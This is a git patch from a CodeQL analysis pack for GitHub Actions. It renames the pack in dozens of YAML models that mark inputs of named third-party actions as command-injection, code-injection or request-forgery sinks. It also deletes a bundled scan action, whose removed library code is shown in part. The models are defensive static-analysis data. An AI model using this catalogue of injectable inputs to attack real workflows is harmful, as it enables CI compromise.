a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index a4ccaac2d2e..28357d5f468 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 7c32705dde5..cfdff1898ae 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 902483f4399..f4ad5f7292b 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index be86a330b97..872b4e243d7 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 0a6f7c34722..bd53ab3d65a 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index 613b3e0fc59..db650eeb7c7 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index 489d47ac71e..34d63f31ca8 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index 4a98ecd4af1..02d6d804699 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 57dc40ef6b8..46fb5fd7dd6 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index 3b92f667ae9..0aab8b94632 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml index da8b02312ea..62bb26ba1ff 100644 --- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml +++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index c06d13301d2..dfacbbc14f4 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 61935c36f7d..b258b619b6c 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 89f61cedc42..76b0c1d7d32 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 1aabfc23fc4..587519e948b 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index d55fdbc3ea9..58cbf9cc742 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index d01ac86d317..cc39018b9b1 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index bab76cbe27f..a0b5bc0dee4 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index 02ac5032c79..89d91208ad4 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index 0c484d44549..65a4cc60652 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index c088c7a644e..d82962aa096 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index 5b22ac1f5fe..32622271d6a 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index 3329a255e6f..8dbc5ee2ade 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 14a1cdeed86..0bbd6364b5e 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"] diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml index 49931d93f88..6d6ec4a393e 100644 --- a/ql/lib/ext/sergeysova_jq-action.model.yml +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index 37d0014bcbb..78737c6bb8b 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 9058c9fb984..64d5aac33ab 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index 713c5c61cea..c921df3fa7d 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 40b02283152..623483db63e 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index c08505f9747..5184c3c4c48 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 6305fd33960..c898d41c838 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 73988096818..d7c874c7787 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index ee9a0dbb32a..398dfb5c766 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index f056cf5d864..872964f8215 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 838f0b30848..91f3c056e6d 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index c215755f61d..79a12582e9e 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index 014e779b29a..a534e3dfcf7 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index 806c055529d..dfaa2e2687d 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index d6e554a8709..f87beb15018 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index 55d1531a770..59cc155b550 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index c52d62e204a..52dcff39903 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 1e915194d96..f9e122c17a9 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/workflow-models/workflow-models.yml b/ql/lib/ext/workflow-models/workflow-models.yml index ff02589fb84..1f0401e8e61 100644 --- a/ql/lib/ext/workflow-models/workflow-models.yml +++ b/ql/lib/ext/workflow-models/workflow-models.yml @@ -1,14 +1,14 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: repositoryDataModel data: [] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: workflowDataModel data: [] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] @@ -55,7 +55,7 @@ extensions: - ["workflow_call", "github.event.workflow"] - ["workflow_call", "github.event.workflow_run"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: externallyTriggerableEventsDataModel data: - ["discussion"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 1cc360c472d..0910261d21d 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index cb7e0936cca..91df4767a72 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index 210c3365eda..57f76c8cb4a 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 10d9eeddcf7..70edc1b0574 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: githubsecuritylab/actions-all +name: github/actions-all version: 0.1.2 dependencies: codeql/util: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 16bad7c15bd..89df5ee8797 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: githubsecuritylab/actions-queries +name: github/actions-queries version: 0.1.2 groups: [actions, queries] suites: codeql-suites @@ -8,5 +8,5 @@ extractor: javascript dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - githubsecuritylab/actions-all: ${workspace} + github/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 1676d742d37..77e25d8e419 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,9 +1,9 @@ --- -name: githubsecuritylab/actions-tests +name: github/actions-tests groups: [javascript, test] dependencies: - githubsecuritylab/actions-all: ${workspace} - githubsecuritylab/actions-queries: ${workspace} + github/actions-all: ${workspace} + github/actions-queries: ${workspace} extractor: javascript tests: . warnOnImplicitThis: true From 06918b0492705cd23477e966184ad59c7262477f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 21 Jun 2024 09:19:37 +0200 Subject: [PATCH 0342/1267] Remove custom scan action --- .github/action/.gitignore | 1 - .github/action/dist/index.js | 30722 ----------------------- .github/action/dist/licenses.txt | 175 - .github/action/package-lock.json | 639 - .github/action/package.json | 48 - .github/action/src/codeql.ts | 172 - .github/action/src/index.ts | 61 - .github/action/tsconfig.json | 24 - .github/workflows/build.yml | 30 - .github/workflows/copy-to-bughalla.yml | 34 - action.yml | 51 - clean.sh | 2 - 12 files changed, 31959 deletions(-) delete mode 100644 .github/action/.gitignore delete mode 100644 .github/action/dist/index.js delete mode 100644 .github/action/dist/licenses.txt delete mode 100644 .github/action/package-lock.json delete mode 100644 .github/action/package.json delete mode 100644 .github/action/src/codeql.ts delete mode 100644 .github/action/src/index.ts delete mode 100644 .github/action/tsconfig.json delete mode 100644 .github/workflows/build.yml delete mode 100644 .github/workflows/copy-to-bughalla.yml delete mode 100644 action.yml delete mode 100755 clean.sh diff --git a/.github/action/.gitignore b/.github/action/.gitignore deleted file mode 100644 index c2658d7d1b3..00000000000 --- a/.github/action/.gitignore +++ /dev/null @@ -1 +0,0 @@ -node_modules/ diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js deleted file mode 100644 index 7281eb9d9b5..00000000000 --- a/.github/action/dist/index.js +++ /dev/null @@ -1,30722 +0,0 @@ -/******/ (() => { // webpackBootstrap -/******/ var __webpack_modules__ = ({ - -/***/ 7351: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); - __setModuleDefault(result, mod); - return result; -}; -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.issue = exports.issueCommand = void 0; -const os = __importStar(__nccwpck_require__(2037)); -const utils_1 = __nccwpck_require__(5278); -/** - * Commands - * - * Command Format: - * ::name key=value,key=value::message - * - * Examples: - * ::warning::This is the message - * ::set-env name=MY_VAR::some value - */ -function issueCommand(command, properties, message) { - const cmd = new Command(command, properties, message); - process.stdout.write(cmd.toString() + os.EOL); -} -exports.issueCommand = issueCommand; -function issue(name, message = '') { - issueCommand(name, {}, message); -} -exports.issue = issue; -const CMD_STRING = '::'; -class Command { - constructor(command, properties, message) { - if (!command) { - command = 'missing.command'; - } - this.command = command; - this.properties = properties; - this.message = message; - } - toString() { - let cmdStr = CMD_STRING + this.command; - if (this.properties && Object.keys(this.properties).length > 0) { - cmdStr += ' '; - let first = true; - for (const key in this.properties) { - if (this.properties.hasOwnProperty(key)) { - const val = this.properties[key]; - if (val) { - if (first) { - first = false; - } - else { - cmdStr += ','; - } - cmdStr += `${key}=${escapeProperty(val)}`; - } - } - } - } - cmdStr += `${CMD_STRING}${escapeData(this.message)}`; - return cmdStr; - } -} -function escapeData(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A'); -} -function escapeProperty(s) { - return utils_1.toCommandValue(s) - .replace(/%/g, '%25') - .replace(/\r/g, '%0D') - .replace(/\n/g, '%0A') - .replace(/:/g, '%3A') - .replace(/,/g, '%2C'); -} -//# sourceMappingURL=command.js.map - -/***/ }), - -/***/ 2186: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); -}) : (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - o[k2] = m[k]; -})); -var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { - Object.defineProperty(o, "default", { enumerable: true, value: v }); -}) : function(o, v) { - o["default"] = v; -}); -var __importStar = (this && this.__importStar) || function (mod) { - if (mod && mod.__esModule) return mod; - var result = {}; - if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, 